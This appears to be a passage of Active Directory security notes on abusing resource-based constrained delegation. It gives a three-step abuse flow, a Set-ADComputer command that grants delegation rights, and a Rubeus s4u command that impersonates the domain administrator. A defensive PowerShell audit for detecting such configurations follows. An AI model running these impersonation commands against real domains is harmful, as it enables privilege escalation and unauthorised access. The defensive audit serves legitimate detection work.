Abuse Flow

  1. Create or compromise a machine account
  2. Grant it delegation rights in the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
  3. Request S4U2Self/S4U2Proxy tickets to impersonate a privileged user

Key Commands

# PowerShell - set RBCD on target ($binsecdesc is the binary security descriptor naming the controlled machine account)
Set-ADComputer TARGET -Add @{'msds-allowedtoactonbehalfofotheridentity'=$binsecdesc}

# Rubeus S4U - S4U2Self/S4U2Proxy request impersonating administrator to the target's cifs SPN
Rubeus.exe s4u /user:svc_web /rc4:<NTLM> /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt
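
A defender-side audit for the three steps above, as an added example that is not part of the original page: it reports the machine account quota, lists computers whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated together with the principals they trust, and flags Domain Admins members that are neither marked non-delegable nor in Protected Users. It assumes the RSAT ActiveDirectory module, read access to the domain, and the default English group names.

```powershell
# Added example: defensive audit for the RBCD flow above. Assumes the RSAT
# ActiveDirectory module and default English group names.
Import-Module ActiveDirectory

# Step 1: a non-zero quota lets any authenticated user create machine accounts.
$domainDn = (Get-ADDomain).DistinguishedName
$quota = (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Output "ms-DS-MachineAccountQuota = $quota"

# Step 2: list every computer with the attribute populated and who it trusts.
$rbcd = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties PrincipalsAllowedToDelegateToAccount, whenChanged |
  ForEach-Object {
    $target = $_
    foreach ($dn in $target.PrincipalsAllowedToDelegateToAccount) {
      # mS-DS-CreatorSID is populated when a non-admin created the account via the quota.
      $p = try {
        Get-ADObject -Identity $dn -Properties whenCreated, 'mS-DS-CreatorSID' -ErrorAction Stop
      } catch { $null }   # entry could not be resolved to a directory object
      [pscustomobject]@{
        Target           = $target.Name
        TargetChanged    = $target.whenChanged
        TrustedPrincipal = $dn
        PrincipalCreated = $p.whenCreated
        CreatorSid       = $p.'mS-DS-CreatorSID'
      }
    }
  }
$rbcd | Sort-Object TargetChanged -Descending | Format-Table -AutoSize

# Step 3: privileged users that can still be impersonated through delegation.
$protected = (Get-ADGroupMember -Identity 'Protected Users' -Recursive).SID.Value
Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
  Where-Object objectClass -eq 'user' |
  Get-ADUser -Properties AccountNotDelegated |
  Where-Object { -not $_.AccountNotDelegated -and $_.SID.Value -notin $protected } |
  Select-Object SamAccountName, AccountNotDelegated
```

Any row in the step 2 table whose trusted principal was created recently or carries a CreatorSid deserves review, since legitimate RBCD entries are normally few and documented.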